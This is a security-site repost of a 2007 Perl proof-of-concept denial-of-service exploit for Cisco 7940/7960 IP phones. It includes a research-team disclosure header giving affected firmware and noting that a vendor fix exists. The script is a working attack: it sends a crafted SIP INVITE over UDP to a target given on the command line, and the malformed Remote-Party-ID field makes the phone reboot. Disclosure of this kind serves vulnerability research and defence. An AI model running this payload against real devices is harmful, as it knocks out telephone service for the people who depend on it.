首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco 7940 SIP INVITE remote DOS
来源:www.vfocus.net 作者:Humberto 发布时间:2007-03-21  
#!/usr/bin/perl
# Title: Cisco 7940 SIP INVITE remote DOS
# Date: February 19, 2007
# ID: KIPH2
#
# Synopsis: After sending a cra fted INVITE message the device immediately
# reboots. The phone does not check properly the sipURI field of the
# Remote-Party-ID in the message.
#
# The vendor was informed and acknowledged the vulnerability. This
# vulnerability was identified by the Madynes research team at INRIA
# Lorraine, using the Madynes VoIP fuzzer.
#
# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol
# for VoIP signalization. SIP is an ASCII based INVITE message is used to
# initiate and maintain a communication session.
#
# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00
#
# Unaffected: devices running firmware POS8-6-0
#
# Description: After receiving one crafted SIP INVITE message, the
# affected device reboots immediately. The proof of concept code can be
# used to demonstrate the vulnerability.
#
# Resolution:
#
# Fixed software is available from the vendor and customers following
# recommended best practices (ie segregating VOIP traffic from data) will
# be protected from malicious traffic in most situations.
#
# Credits:
#
# Humberto J. Abdelnur (Ph.D Student)
#
# Radu State (Ph.D)
#
# Olivier Festor (Ph.D)
#
# This vulnerability was identified by the Madynes research team at INRIA
#
# Lorraine, using the Madynes VoIP fuzzer.
#
# http://madynes.loria.fr/

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);


$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);


$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: <sip:$ARGV[2]\@$ARGV[0];user=ip>\r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP <= 4.4.6 / 5.2.1 ext/gd Al
·Mercur IMAPD 5.00.14 Remote De
·FTPDMIN 0.96 (LIST) Remote Den
·phpRaid < 3.0.7 (rss.php phpra
·GeBlog 0.1 GLOBALS[tplname] Lo
·PHP <= 5.2.1 hash_update_file(
·pragmaMX Module Landkarten 2.1
·Monster Top List <= 1.4.2 (fun
·Helix Server 11.0.1 Remote Hea
·MetaForum <= 0.513 Beta Remote
·Grandstream Budge Tone-200 IP
·ScriptMagix Lyrics <= 2.0 (ind
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved